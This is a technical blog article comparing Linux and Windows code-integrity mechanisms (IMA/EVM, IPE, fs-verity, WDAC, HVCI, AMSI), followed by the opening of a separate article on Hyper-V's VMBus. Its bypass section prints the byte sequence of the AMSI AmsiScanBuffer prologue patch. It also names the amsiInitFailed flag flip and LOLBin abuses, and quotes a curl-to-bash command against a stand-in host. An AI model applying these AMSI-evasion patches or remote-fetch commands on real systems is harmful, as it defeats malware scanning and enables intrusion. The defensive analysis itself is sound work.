op=EXECUTE dmverity_signature=TRUE dmverity_roothash=sha256:<hex> action=ALLOW
op=EXECUTE fsverity_signature=TRUE action=ALLOW
op=EXECUTE action=DENY

The kernel is not asked "what is the SHA-256 of this file?" at op=EXECUTE time. It is asked "did this file come from a dm-verity device whose root hash matches one of our trusted signatures?" The verifier has nothing to compute per access; it has only to read a pre-computed property. The trust boundary has moved out to whoever signed the dm-verity image at build time.

fs-verity (Linux 5.4, November 2019): O(log n) per page

The cryptographic complement is fs-verity [@kernel-org-filesystems-fsverityhtml], upstreamed in Linux 5.4 in November 2019 by Eric Biggers and Theodore Ts'o at Google. The kernel docs describe the trick: "fs-verity is similar to dm-verity but works on files rather than block devices ... userspace can execute an ioctl that causes the filesystem to build a Merkle tree for the file and persist it to a filesystem-specific location ... Userspace can use another ioctl to retrieve the root hash ... in constant time, regardless of the file size."

The Merkle tree turns whole-file hashing into O(log n) verification per page read, with constant-time digest retrieval. Concretely, an APK or container layer with thousands of pages does not need a full hash on first open; the page cache verifies the leaves and intermediate Merkle nodes only for the pages actually touched. IMA can consume fs-verity's digest directly through the digest_type=verity modifier in its policy language.

The breakthrough was not a stronger check. It was moving the check out of the attacker's address space.

Each pivot moved the trust boundary outward in a different direction. EVM moved the integrity root from "xattr next to the file" to "HMAC-keyed xattr, key sealed to TPM PCRs". HVCI moved the kernel-mode verifier from "in the kernel the attacker can patch" to "in a secure kernel the attacker cannot reach without breaking the hypervisor". IPE moved the per-access decision from "recompute a file's hash" to "look up a precomputed property". Fs-verity collapsed the per-access cost from O(n) on the file to O(log n) on a Merkle path.

The crypto was already strong. The breakthrough was the geometry of where the verifier lived.

By 2020 both stacks looked dramatically different from their 2009 and 2015 originals. Here is what each one looks like today, side by side.

6. The stack today, side by side

Eleven moving parts. Here is how they line up.

Linux	Windows	Layer
IMA appraise + EVM	App Control (WDAC) UMCI	User-mode code integrity
Kernel module signing	App Control + HVCI driver enforcement	Kernel-mode code integrity
fs-verity + dm-verity	HVCI page-level W^X + signed catalogues	Page-level integrity
AppArmor / SELinux	(no direct analogue; closest is AppContainer / ASR)	Mandatory access control
fapolicyd	App Control + AppLocker	User-space allowlist
IPE	App Control (FilePath / hash rules)	Property-based code integrity
(no direct analogue)	AMSI	Script content scan
(no direct analogue)	Smart App Control + ISG	Cloud reputation

The mapping is not 1-to-1 in either direction. Linux composes; Windows consolidates. To compare meaningfully we have to look at each layer in turn.

6.1 Code-integrity enforcers: IMA + EVM vs WDAC vs IPE

Dimension	Linux IMA + EVM	WDAC (App Control)	IPE
Enforcement layer	VFS / LSM hook (file open, mmap, exec)	PE loader (kernel CI, user-mode CI)	LSM hook on `op=EXECUTE`
Identity primitive	File-content hash or `imasig` / `modsig` / `sigv3`	Authenticode chain, hash, FilePath, or ISG	dm-verity root hash / fs-verity digest
Policy expression	Procedural rules (`func=` / `mask=` / `fsmagic=`)	Signed XML compiled to binary `.p7b`	Signed plain-text DFA
Worst-case per-access	O(n) hash on first access; O(1) cached	O(1) cached; O(n) hash on cache miss	O(1) (properties precomputed)
Fail-closed mode	Yes (appraise)	Yes (enforced)	Yes
Remote-attestation friendly	Yes (TPM PCR 10)	Indirect (Measured Boot logs)	Indirect
Bypass arms race	Whole-disk swap (countered by EVM key sealing)	LOLBins (Microsoft block list + community LOLBAS)	Limited surface (DFA-only)

The IMA policy ABI [@kernel-org-testing-imapolicy] documents the full rule grammar: action [condition ...] where action is one of measure | dont_measure | appraise | dont_appraise | audit | dont_audit | hash | dont_hash, and conditions select on func=, mask=, fsmagic=, fsuuid=, uid=, fowner=, LSM-label predicates, and the all-important appraise_type= modifier that names the signature scheme. IMA template management [@docs-kernel-org-ima-templateshtml] controls what gets recorded per measurement-list entry; the two templates used in practice today are ima-ng (d-ng|n-ng: hash-algo-prefixed digest plus name) and ima-sigv2 (d-ngv2|n-ng|sig: versioned digest plus name plus signature).

WDAC's policy rule reference [@learn-microsoft-com-to-create] defines the rule kinds operators actually write: Publisher, PcaCertificate, LeafCertificate, FileName, Version, Hash (SHA-1, SHA-256, or SHA-384), FilePath (added in 1903 and explicitly weaker because a user with write access can substitute the file), Managed Installer, and Intelligent Security Graph. The compiled output is a signed binary .p7b CIPolicy.

The same doc records the default-on audit-mode behaviour that has surprised many operators: "We recommend that you use Enabled:Audit Mode initially because it allows you to test new App Control policies before you enforce them ... By default, only kernel-mode binaries are restricted. Enabling the following rule option validates user mode executables and scripts." The Enabled:UMCI flag is what flips a WDAC policy from kernel-only to full user-mode enforcement.

flowchart LR PE[PE load request] --> AC[Parse Authenticode signature] AC --> RM[Match rule set] RM --> P[Publisher / cert rule?] P -->|hit| AL[Allow] P -->|miss| H[Hash rule?] H -->|hit| AL H -->|miss| FP[FilePath rule?] FP -->|hit| AL FP -->|miss| MI[Managed Installer?] MI -->|hit| AL MI -->|miss| ISG[Intelligent Security Graph?] ISG -->|hit| AL ISG -->|miss| DEF[Default action] AL --> BL{"In bypass-list deny?"} BL -->|yes| BLK[Block] BL -->|no| LOAD[Loader continues] DEF --> BLK

6.2 Mandatory access control: AppArmor vs SELinux

Dimension	AppArmor	SELinux
Model	Path-based allowlist per binary	Type-enforcement on subject x object x class
Storage of policy state	In-memory DFA loaded from user space	`security.selinux` xattr + compiled `policy.31`
Granularity	Profile per executable	Per-type, per-class, per-operation
Survives file rename	No (path is the identity)	Yes (xattr travels with inode)
Default-on distros	Ubuntu, openSUSE, SLES	RHEL, Fedora, Oracle Linux, Android, ChromeOS
Authoring tools	`aa-genprof`, `aa-logprof`, `aa-enforce`	`audit2allow`, `semodule`, refpolicy, `udica`

AppArmor's kernel documentation [@docs-kernel-org-lsm-apparmorhtml] describes the model directly: "AppArmor is MAC style security extension for the Linux kernel. It implements a task centered policy, with task 'profiles' being created and loaded from user space." A profile reads like a rule file rather than a label algebra:

/usr/sbin/nginx {
  capability net_bind_service,
  /etc/nginx/** r,
  /var/log/nginx/* w,
  /var/www/** r,
  network inet stream,
}

The kernel compiles each profile to a DFA at load time, so policy lookup is O(L) in path length. SELinux's compiled policy uses a hash-table query against compiled type-enforcement rules with an in-memory access-vector cache for O(1) hot decisions. Both are practical; they differ on which model fits the way an administrator thinks. AppArmor wins on auditability and quick authoring; SELinux wins on expressiveness and on what the Wikipedia summary [@en-wikipedia-org-security-enhancedlinux] calls Mandatory Access Control for multi-level security. Smack [@schaufler-ca-com] is a third in-tree LSM, simpler than SELinux, used heavily by Tizen.

Red Hat's `fapolicyd` is the answer for operators who want App Control-style allowlisting without rebuilding the kernel. Trust is inherited from the RPM database; the daemon sits on the kernel's `fanotify` permission channel and answers ALLOW or DENY on every `open` and `exec`. Per the RHEL hardening guide [@access-redhat-com-fapolicydsecurity-hardening], rule files in `/etc/fapolicyd/rules.d/` are concatenated in lexicographic order into `compiled.rules`. The Red Hat-shipped numbered prefixes are 10 (language interpreters), 20 (dracut), 21 (updaters), 30 (patterns), 40/41/42 (ELF), 70 (trusted languages), 72 (shell), 90 (deny-execute), 95 (allow-open). First-match-wins evaluation means operators adding custom rules must give their file a number lower than 90 to ensure their `allow` is reached before the catch-all deny.

6.3 Hypervisor-anchored CI: HVCI

HVCI's runtime cost is dominated by the hypercall round-trip from VTL0 to VTL1 on driver load and on each executable-page allocation. Steady-state overhead is small on hardware with the right capabilities.

Microsoft's HVCI documentation [@learn-microsoft-com-code-integrity] names the dependency: "Memory integrity works better with Intel Kabylake and higher processors with Mode-Based Execution Control, and AMD Zen 2 and higher processors with Guest Mode Execute Trap capabilities. Older processors rely on an emulation of these features, called Restricted User Mode, and will have a bigger impact on performance." Practitioner-visible rule of thumb: less than 5 percent overhead on MBEC/GMET-capable silicon, 10 to 20 percent on kernel-bound workloads when the CPU has to emulate.

HVCI hardware prerequisites per the OEM VBS guidance [@learn-microsoft-com-oem-vbs]: 64-bit CPU with virtualization extensions (VT-x or AMD-V), second-level address translation (EPT or RVI), an IOMMU (VT-d or AMD-Vi), TPM 2.0, UEFI MAT, Secure MOR v2, and ideally MBEC (Intel) or GMET (AMD).

6.4 Script-level inspection: AMSI vs Linux's gap

Dimension	AMSI	Linux IMA on scripts
What it sees	Deobfuscated script buffer at execution time	Whole-file content at `open` or `mmap`
Coverage	PowerShell, WSH, VBA, JScript, MSHTA, UAC installers, .NET, Edge	Any file whose `func=FILE_CHECK` rule matches
Provider model	COM `IAntimalwareProvider` per process	None; kernel verifies signature directly
Defends against runtime obfuscation	Yes (sees final buffer)	No (sees file as written)
Trust boundary	Wrong (in-process; patchable by attacker)	Right (kernel-side; attacker cannot patch)

The asymmetry is the point. AMSI sees what the interpreter is about to evaluate; IMA sees only what is on disk. AMSI catches in-memory PowerShell payloads, Office macros that decode themselves at runtime, and Invoke-Expression evaluations that never touched the filesystem. IMA's hash is final at file write time and tells you exactly nothing about what bash -c "$(curl evil)" will execute.

The reduced PowerShell language mode App Control forces on systems with UMCI enabled. It blocks reflection (the `[System.Reflection]` namespace), dynamic-type creation, and arbitrary .NET API calls. It is the runtime-side complement to App Control: even if a script gets in, its evaluation surface is dramatically reduced. This is also what makes the `amsiInitFailed` flag-flip bypass non-trivial under modern App Control: the reflection needed to set the flag is blocked.

6.5 Cloud reputation: Smart App Control

Smart App Control [@learn-microsoft-com-business-appcontrol] ships as a pre-baked WDAC policy bundled with Windows 11 22H2 and later. The App Control overview describes it as the consumer-facing entry point introduced in Windows 11 version 22H2 to bring application control to home users. On every fresh install SAC starts in evaluation mode for 48 hours. Microsoft's cloud reputation service silently observes the user's app inventory; on enterprise-managed devices SAC auto-disables at the end of the window unless the user explicitly opts in. Once disabled by user, policy, or the auto-disable rule, it can only be re-enabled by performing a clean install of Windows. A Settings > Reset This PC is not sufficient.

Three quirks operators must understand. First, evaluation lasts 48 hours and is silent. Second, enterprise-managed (Intune, AAD-joined, GPO-managed) devices auto-disable at evaluation end. Third, disable is one-way: there is no "restart evaluation" path. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. Consumers with a small app footprint and no IT team get a cloud-driven allowlist for free; everyone else is expected to author a policy.

Note: Once Smart App Control is off on a device, it can only be re-enabled by performing a clean install of Windows. A Settings > Reset This PC does not re-enable SAC. Treat enabling SAC as a deployment decision, not a casual toggle.

6.6 fs-verity as the per-file Merkle layer

For the data-at-rest performance story, fs-verity's ioctl(FS_IOC_ENABLE_VERITY) builds the Merkle tree, persists it next to the file, and switches the file to read-only. FS_IOC_MEASURE_VERITY returns the digest in constant time. IMA's policy language gained appraise_type=sigv3 and the digest_type=verity modifier so a rule like

appraise func=BPRM_CHECK fsmagic=0xef53 appraise_type=sigv3 digest_type=verity

asks the filesystem for the file's fs-verity digest (O(1)) and verifies the kernel-stored signature over that digest, rather than re-hashing the file even on first access. Supported on ext4, f2fs, and btrfs.

Eleven mechanisms, two architectures, one shared shape: an allowlist of trusted producers plus a hook that can refuse to honour anything outside it. The allowlist of producers is the deepest common assumption, and it is also where the next class of attacks lives.

7. Bypass arms races

Every code-integrity system on the market is in a continuous fight with the bypass it shipped with. The fights tell you what each architecture got wrong.

The AMSI bypass family

The three single-shot techniques from Section 4 -- prologue patch, amsiInitFailed flag flip, library unload -- have all been answered by partial mitigations. Microsoft has hardened AMSI provider loading [@learn-microsoft-com-interface-portal] to require Authenticode-signed provider DLLs from Windows 10 1903 onward. Defender ships ETW-based detection that flags in-memory patches to amsi.dll. Constrained Language Mode (forced by App Control) blocks the reflection needed to flip AmsiUtils.amsiInitFailed. None of these closes the structural problem. AMSI is by design a function call inside the script host. As long as the host process is the trust boundary, the attacker who reaches the host process wins.

The trust boundary is wrong: the host process making the AMSI call is the same process the attacker is running in. The simplest in-memory patch overwrites `AmsiScanBuffer`'s prologue with a six-byte sequence that loads `AMSI_RESULT_CLEAN` (0) into EAX and returns:

xor eax, eax    ; 31 C0
ret             ; C3

or, depending on the calling convention the patcher targets:

mov eax, 0x80070057   ; B8 57 00 07 80   (HRESULT E_INVALIDARG)
ret                   ; C3

Both variants are detected by modern Defender via the ETW patch detection, but neither requires kernel privileges or a syscall to apply.

The WDAC LOLBin arms race

Microsoft's App Control bypass list [@learn-microsoft-com-bypass-appcontrol] is a maintained document that any non-trivial WDAC policy must merge into its deny rules. The 40-plus entries include mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, addinutil.exe, aspnet_compiler.exe, bash.exe, wsl.exe, runscripthelper.exe, system.management.automation.dll, and webclnt.dll / davsvc.dll. The community LOLBAS index [@lolbas-project-github-io] widens the field to roughly 200 entries with MITRE ATT&CK technique IDs.

Tooling (the WDAC Wizard, AaronLocker, Microsoft's ConfigCI PowerShell module, CiTool.exe) automates merging the deny set into a base policy and onto Intune. The asymmetry is the bottom line: trust granted at signer granularity, exploitation at binary granularity. The deny list is not a fix; it is a treadmill.

A trusted binary, often shipped by the OS vendor and signed by the vendor's code-signing certificate, that an attacker re-purposes to bypass an allowlist or to perform actions that would be blocked if attempted with non-vendor tooling. Examples on Windows: `mshta.exe` to evaluate HTA scripts, `regsvr32.exe` to execute a remote scriptlet, `installutil.exe` to run code via a designed-for-development assembly loader.

fapolicyd permissive-window

This is not a cryptographic bypass; it is the architectural choice (userspace daemon over fanotify) showing its operational seam. A privileged operator who sets permissive=1 to debug a noisy rule and forgets to revert has silently disabled enforcement. If the daemon dies under load or after a bad rule deploy, the kernel waits for the fanotify response timeout and then fails open. There is no failsafe equivalent of HVCI's "the verifier is in another address space" guarantee.

IMA / EVM offline-key attacks

EVM is only as strong as its key custody. If the HMAC key is loaded from a file on disk (the worst-case configuration), an attacker with root on a running system can read it, then perform the offline-rewrite attack of Section 4 with a valid security.evm HMAC. TPM-sealed keys close this path on hardware that supports sealing; some installations skip the seal step "until we add a TPM" and never do. Asymmetric (EVM portable signatures) mode avoids on-box key custody but requires a per-package signing pipeline most distributions have not built.

The cross-stack symmetry

Both lineages obey two architectural rules, and both have at least one place where they break each rule:

Bypass class	Linux instance	Windows instance	Root cause	Partial mitigation
Verifier shares address space with attacker	(script interpreters; no in-kernel interpreter scanner)	AMSI prologue patch, `amsiInitFailed` flag flip	Software-only protection of an in-process secret is impossible	ETW patch detection, signed providers, Constrained Language Mode
Trust grant coarser than exploit unit	RPM trust pre-fapolicyd integrity-mode addition	WDAC Publisher rules + LOLBins	Trust algebra cannot express "Microsoft except mshta" with one rule	Hash-level denies, growing block list
Reference value reachable by attacker	IMA without EVM	(HVCI moved the kernel verifier out of reach)	Reference value next to the file under attacker control	EVM HMAC sealed to TPM PCR
Verifier is killable	fapolicyd daemon failure	(HVCI verifier is hypervisor-isolated)	Verifier liveness is part of the trust assumption	TPM-sealed boot policy + kernel-mode fallback

The first row is the most uncomfortable for both stacks. Linux does not have an AMSI-equivalent in production, so there is no in-kernel hook that sees the buffer an interpreter is about to evaluate; the boundary is not "wrong", it simply does not exist. Windows has the hook and has paid for the consequences of putting it in the wrong place for ten years. Neither result is good.

The lesson from both rows of pivots is consistent: when an architecture is forced to put the verifier somewhere reachable, treat its output as telemetry rather than control, and budget for the bypass.

These are not implementation bugs. They are structural features of the architectures, and to understand why, we have to look at what computer science says is and is not possible.

8. What the theory says

Three impossibility results bound everything in this article. Two are decades old; the third is a property of how modern interpreted languages execute.

Rice's theorem

Rice's 1953 theorem says that any non-trivial semantic property of an arbitrary program is undecidable from the program text alone. Applied to malware: there is no algorithm that takes a binary as input and returns "malicious" or "benign" in finite time for every input.

Every code-integrity stack on the market therefore reduces to the same shape: an allowlist of producers (signers, hashes, dm-verity roots) the operator chooses to trust, plus a hook that refuses to honour anything outside the allowlist. Defender, ClamAV, the AMSI scanner -- all the things we call "malware detectors" -- are heuristic add-ons running on top of an allowlist substrate, and they are explicitly fallible. They have to be.

No software-only protection of an in-process secret

The second result is operational, not formal, but it is no less binding. If process P holds a secret S, and process P also evaluates code C the attacker chose, then no purely software-side technique inside P can keep C from reading or rewriting S.

AMSI's design violates this: the scanner is a function call inside the script host, and the attacker is running code in the script host. HVCI's entire architecture exists to relocate the kernel-mode code-integrity verifier out of the host's address space, into a secure kernel the attacker cannot reach with normal kernel privileges. EVM's design likewise moves the integrity-defining key into a kernel keyring sealed to TPM PCRs so an offline attacker with disk access cannot reach it.

No verification of dynamically generated executable code

The third result is the gap on both operating systems. JIT-compiled code (V8, JVM, CLR), libffi closures, and anonymous mmap followed by mprotect(PROT_EXEC) all produce executable bytes that did not exist on disk and were never hashed.

The IPE documentation [@docs-kernel-org-lsm-ipehtml] lists this as an explicit limitation: a property-based check on the file the JIT compiled does not authenticate the bytes the JIT emitted. WDAC's User-Mode Code Integrity has the same gap for managed runtimes that emit IL at runtime. There is no production answer on either side; there are only mitigations: disable JITs where possible, run them in restricted runtimes (Constrained Language Mode), block the trampolines.The JIT gap is one reason both stacks ship "Constrained Language Mode"-style restricted-runtime options. PowerShell's Constrained Language Mode blocks reflection and dynamic-type creation; the JVM's --module-path and module-system encapsulation play a similar role for hosted Java code; the CLR's AppContainer and the .NET Core trim modes lean the same way. None of these "verify" the JIT output; they restrict what the runtime is willing to emit.

Cryptographic bounds

The cryptographic side, by contrast, is closed.

Any preimage-resistant hash needs $\Omega(n)$ work on the data being hashed. You cannot verify a file you do not read.
A Merkle tree with leaf size $k$ over a file of size $n$ reduces this to $O(\log(n/k))$ per partial read. The classic Merkle 1979 construction underlies dm-verity, fs-verity, and the Android APK Signature Scheme v4. fs-verity matches this lower bound.
Whole-file SHA-256 on modern x86 with SHA-NI runs at roughly $2 \text{ GB/s}$ per core; SHA-512 at $\sim 1.4 \text{ GB/s}$. A 100 MB binary verifies in roughly $50 \text{ ms}$ worst-case and $0 \text{ ms}$ cached. RSA-2048 and Ed25519 signature verification both finish in well under a millisecond on modern hardware (tens to a few hundred microseconds depending on CPU and library); verify cost is not the bottleneck.

So on the crypto side the gap between upper and lower bounds is closed. On the policy-expressiveness side there is no "best" policy because the right policy depends on threat model. There is no Pareto frontier; there are only trade-offs.

Bound	What it says	Mechanism that matches it	Remaining gap
Rice's theorem	"Is this binary malicious?" is undecidable	Every CI stack is an allowlist + signer model	Allowlist composition is itself a policy problem
In-process secret	No purely-software defence inside the attacker's address space	HVCI moves verifier to VTL1; EVM key in keyring sealed to TPM	AMSI design violates this; the gap is structural
Hash verification	$\Omega(n)$ per full read; $O(\log n)$ per partial read	fs-verity per page; IMA cached on `i_iversion`	Cold-cache cost remains O(n) for non-fs-verity files
JIT and dynamic code	No way to verify code that did not exist on disk	None	Restricted-runtime modes (CLM, AppContainer) are the best partial answer
Asymmetric verify	About 60-300 us per RSA-2048 or Ed25519 verify on modern x86	Authenticode catalogues amortise; IMA caches in inode	Cold cache is the only sensitive case

Key idea: Crypto is closed. Policy expressiveness and trust-boundary protection are theoretically unsolvable in general. Every stack is an allowlist plus a trusted-signer model, never a malware detector. The wall is theoretical, not engineering.

If the theory says we cannot win, what is research targeting in 2026?

9. Open frontiers

Three problems define the 2026 research front. All are being worked on upstream. None will dissolve the theoretical bounds of Section 8.

Linux integrity at distribution scale: the Integrity Digest Cache

IMA appraisal has a scale problem. On a general-purpose Linux distribution where every file is RPM-signed, asking IMA to verify a per-file imasig signature on every open is expensive.

Roberto Sassu (Huawei Cloud) proposed a fix as the digest_cache LSM in version 3 of the patchset, posted in February 2024 [@lore-kernel-org-1-robertosassuhuaweicloudcom] and covered on LWN [@lwn-net-articles-961591]. The v3 cover letter is concrete: "Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." The design extracts pre-computed reference digests from vendor-signed digest lists (RPM headers, kernel TLV digest-list format, third-party formats via loadable parsers) and exposes a digest_cache_lookup() primitive that integrity providers (IMA, IPE, BPF LSM) call instead of verifying per-file signatures.

By v6 in November 2024 [@lore-kernel-org-1-robertosassuhuaweicloudcom-2] the work had been retitled "Introduce the Integrity Digest Cache" and pivoted from a standalone LSM into an integrity-subsystem helper, in response to maintainer feedback. The v6 cover letter quantifies the baseline the design attacks: IMA measurement "introduces a noticeable overhead (up to 10x slower in a microbenchmark) on frequently used system calls, like the open()." Discussion continues on the linux-integrity list [@lore-kernel-org-linux-integrity]; memory safety of the TLV parser was verified with the Frama-C [@frama-c-com] static analyser. As of late 2024 the work is not yet upstream.

Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read. -- Roberto Sassu, digest_cache LSM v3 cover letter, February 2024

The important framing correction: the Integrity Digest Cache is not a Linux AMSI equivalent. AMSI is an interpreter-side scanner of the deobfuscated, about-to-execute script buffer. The Integrity Digest Cache is a file-content digest delivery mechanism that closes the same gap IMA already closes, but more efficiently and at distribution scale. The Linux script-content gap remains genuinely open.

Out-of-process AMSI broker

The conjectural fix on the Windows side is an out-of-process AMSI broker: every AmsiScanBuffer call IPCs to a service running outside the script host's address space. The in-process bypass family disappears because the attacker is no longer in the same process as the scanner. The cost is a context switch and serialisation overhead per script eval.

Microsoft has layered partial mitigations -- signed AMSI provider DLLs from 1903, ETW patch detection in Defender, Constrained Language Mode under App Control -- but no full out-of-process redesign exists. Whether it ever will is a function of how willing Microsoft is to pay the latency cost on hot PowerShell loops.

Cross-OS attestation

A verifier validating evidence from a mixed Linux + Windows fleet today must speak two languages at once. IMA's measurement-log format (ima_template_fmt) and Windows Measured Boot's WBCL [@trustedcomputinggroup-org-log-format] both target TPM PCRs but encode events differently.

Confidential-computing efforts (Intel TDX, AMD SEV-SNP) are pushing toward a common report/quote primitive at the platform layer, and the TCG Canonical Event Log Format aims at a portable per-entry representation. Workload-level integrity proofs remain stack-specific. The two operating systems do not yet speak a common attestation language.

Problem	Current best partial result	Upstream status
IMA appraisal scale on RPM-signed distros	Integrity Digest Cache, 45-65% appraisal speedup	Patchset v6 (Nov 2024); not upstream
AMSI in-process trust boundary	Signed provider DLLs, ETW patch detection, CLM	Partial; structural fix would be OOP broker
Linux script-content scanning	Nothing in production	Open
Cross-OS attestation interop	TCG CEL, TDX/SEV-SNP quotes	Platform-layer; workload-level still split
WDAC LOLBin treadmill	Microsoft block list + LOLBAS + WDAC Wizard	Operational; structural fix unknown

Each of these will probably ship in the 2026-2028 window. None of them dissolves the theoretical bounds of Section 8. The job for a defender in 2026 is therefore operational, not technological.

10. Practitioner decision guide

Eight common deployment scenarios. Eight concrete answers.

If you need...	On Linux, use...	On Windows, use...
TPM-backed remote attestation	IMA + EVM (TPM PCR 10)	Measured Boot + TPM PCR 11 + HVCI
Block unsigned drivers	`module.sig_enforce=1` plus kernel module signing	HVCI (Memory Integrity)
Cryptographic allowlist of installed software	fapolicyd (RPM/DEB trust)	App Control with Publisher rules
Per-app sandbox	AppArmor or SELinux	AppContainer or App Control (no direct equivalent)
Catch in-memory PowerShell payloads	(no direct equivalent)	AMSI
Consumer-grade reputation gating	(no direct equivalent)	Smart App Control
Immutable appliance image	dm-verity + IPE	App Control with hash rules + HVCI
Large APK-style assets verified lazily	fs-verity	(no direct equivalent)

The why behind each row.

TPM-backed attestation. On Linux, IMA's measurement mode extends file hashes into PCR 10 and ships the measurement log to a remote verifier (Keylime, Veraison). On Windows it means consuming the Measured Boot event log a Windows kernel emits while VBS+HVCI is enabled. Both stacks target the same root of trust (the TPM) but speak different event formats.

Blocking unsigned drivers. Linux uses a built-in kernel module signing flag. Windows needs HVCI, because the kernel-mode CI check runs in VTL1 and any policy weakening attempted from VTL0 with SYSTEM cannot reach it.

Application allowlisting on general-purpose distributions. This is fapolicyd's wheelhouse: it inherits trust from the RPM/DEB database, which is the only place a general-purpose distro has a clean "trusted" list. On Windows, App Control with publisher rules plus a managed-installer policy is the equivalent.

Per-app sandboxing. Clean Linux story (AppArmor or SELinux per binary). On Windows it is the gap App Control was never quite designed to fill; AppContainer or Microsoft Defender Attack Surface Reduction rules are the substitutes.

In-memory PowerShell payloads. AMSI's use case. Linux has nothing equivalent in production.

Consumer reputation gating. Smart App Control's use case. Linux distros have nothing equivalent because the distribution-package model already plays that role.

Immutable appliance images. Dm-verity plus IPE on Linux. App Control hash rules plus HVCI on Windows.

Large lazy-loaded assets. Fs-verity territory; Windows has no public equivalent.

Common implementation pitfalls

Distilled from the same shape: every stack has a default that surprises operators.

IMA without EVM and without a TPM-sealed key is decorative. Hashing files into an xattr the attacker can rewrite buys you nothing against offline access. EVM is mandatory; the EVM key must be sealed.
AppArmor profiles authored in complain mode never get promoted to enforce. Schedule a config-management pass that runs aa-enforce on the profiles you actually want to confine.
SELinux setenforce 0 for debugging that becomes permanent. The /.autorelabel flag is required after restoring contexts; track that you flipped it.
fapolicyd permissive-mode lapses. Set up alerting on permissive=1 in the runtime configuration; treat the daemon's exit status as a security event.
WDAC's Enabled:Audit Mode policy-rule option is on by default. Policies silently do not enforce until you remove it. Add a deployment check that asserts audit mode is off before declaring rollout complete.
HVCI without a driver-compatibility check. Microsoft's DG_Readiness_Tool and the HVCI compatibility report belong in every pilot. Vendors that allocate RWX kernel pages will fail HVCI loading and leave the host unbootable.
Treating AMSI as a control. It is telemetry. Budget for the bypass on day one.
Smart App Control disable is one-way. A single mis-click ends the consumer reputation gate until the device is reset. Make sure the user understands this before they tap the toggle.

Note: On Linux: enable IMA in measure mode before appraise; deploy AppArmor / SELinux profiles in complain / permissive before enforce; run fapolicyd with permissive=1 for the first deploy. On Windows: leave WDAC's Enabled:Audit Mode set during the first rollout and use the event log to identify the policy gaps before flipping to enforced. Audit mode is the only safe way to discover that the policy is wrong before it locks you out of production.

Note: A bare IMA appraisal policy without an HMAC-keyed EVM (and without the key sealed to a TPM 2.0 PCR set) does not stop an offline attacker. If you do not have TPM-sealed key custody and signed-xattr xattrs, IMA appraisal is mostly a check-box. fapolicyd with integrity=ima may be a saner starting point on machines without TPM.

Usually no, unless your distribution signs every system file (most do not for `imasig` in production) and you have a TPM-sealed EVM key. For general-purpose servers, fapolicyd with RPM-database trust is usually the right answer; it inherits trust from packages you already trust and does not require kernel-side signature infrastructure. Reserve IMA appraise for appliance / fixed-function builds, embedded distros, or fleets with a signed-package pipeline. Path-based reasoning maps to how administrators think about confinement: "this binary may read /etc/nginx, may write /var/log/nginx, may bind a network socket." SELinux's type-enforcement model is more expressive (it lets a single rule cover an entire class of objects across paths and bind mounts), but it requires the administrator to think in compiled-policy terms. Both are correct; pick the one whose mental model matches your team. The right answer on Ubuntu and SUSE is almost always AppArmor; the right answer on RHEL and Android is almost always SELinux. No. Microsoft's block list [@learn-microsoft-com-bypass-appcontrol] grows whenever a new signed binary turns out to host an attacker-friendly evaluator. Treat WDAC as defence-in-depth, layered with HVCI and AMSI-as-telemetry, not as a single-point allowlist. The WDAC Wizard and AaronLocker projects automate keeping the deny set current; even with them, expect the deny set to evolve every quarter. Yes. Enable it, but configure it as a telemetry source feeding Defender for Endpoint and any EDR pipeline you operate. The bypass family of Section 7 is real, but the un-bypassed case still catches the long tail of script-based attacks that do not bother defeating AMSI, and the bypass attempt itself is highly detectable (in-memory patch ETW events). Treat AMSI alerts as detective controls, not preventive controls. On CPUs with Intel MBEC (Kaby Lake or newer) or AMD GMET (Zen 2 or newer) [@learn-microsoft-com-oem-vbs], the steady-state overhead is generally under 5 percent. On older CPUs that rely on the Restricted User Mode emulation path, kernel-bound workloads can see 10 to 20 percent regressions. Run your specific kernel-bound benchmarks on the actual hardware before enabling on a fleet with a mixed CPU generation; "free" is a Kaby Lake-and-newer claim. Usually no. SAC auto-disables on enterprise-managed devices (Intune-enrolled, Azure AD-joined, or under Group Policy management) at the end of the 48-hour evaluation window unless the user explicitly opts in. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. If SAC has already auto-disabled and you actually want it on, the only path to re-enable is a clean install of Windows. A Settings > Reset This PC does not bring it back.

The two architectures answer the same question with different trade-offs. A practitioner in 2026 needs both maps, because the bypass that breaks the Linux side rarely looks like the bypass that breaks the Windows side, and the mitigation that fixes one is rarely the mitigation that fixes the other.

What stays constant is the lesson the two lineages converged on over fifteen years: the trust boundary is the architecture. Move the verifier out of reach. Allowlist the producers. Treat the things that cannot be moved as telemetry, not as control. None of that closes Rice's wall, but all of it pushes the actual exploitable surface back another mile, on both operating systems.

Hyper-V Enlightenments, VMBus, and the Synthetic Device Model

noreply@paragmali.com (Parag Mali) — Thu, 14 May 2026 00:00:00 GMT

Hyper-V's guest OSes do not see emulated 1990s hardware. They see a published, versioned hypervisor ABI called the **Top-Level Functional Specification**, a transport called **VMBus** that consists of two ring buffers per channel, and a catalogue of synthetic devices whose backends live in the privileged root partition. This design is what makes Windows and Linux equally fast inside Hyper-V, and it is also why the host-side parsers in `vmswitch.sys` keep producing critical CVEs. The 2024 OpenHCL paravisor moves those parsers into the guest's own trust boundary in memory-safe Rust, which is the most consequential change to the Hyper-V device model since 2008.

1. The Type-1 hypervisor foundation

Open Task Manager on a modern Windows 11 desktop, switch to the Performance tab, and look at the line that says "Virtualization: Enabled." That single line hides one of the most consequential design choices in modern operating systems: when Microsoft shipped Hyper-V with Windows Server 2008 in June 2008 [@ms-hyperv-server-overview], they did not bolt a virtualization product on top of Windows. They put a small hypervisor underneath it.

That ordering matters more than it sounds. In the older Microsoft Virtual Server 2005 model, Windows ran on the bare metal and a user-mode service emulated PC hardware for guests inside it. In the Hyper-V architecture documented by Microsoft in 2008 [@ms-hyperv-architecture], the hypervisor boots first and Windows itself becomes a guest of the hypervisor. Microsoft calls this guest the root partition. Every other VM on the box is a child partition.

A hypervisor that runs directly on the physical hardware rather than inside a host operating system. Hyper-V, VMware ESXi, and Xen are Type-1; VirtualBox and the original Microsoft Virtual Server are Type-2 (hosted). In a Type-1 design no general-purpose OS sits between the hypervisor and the silicon, which lets the hypervisor enforce isolation directly using CPU virtualization extensions like Intel VT-x and AMD-V.

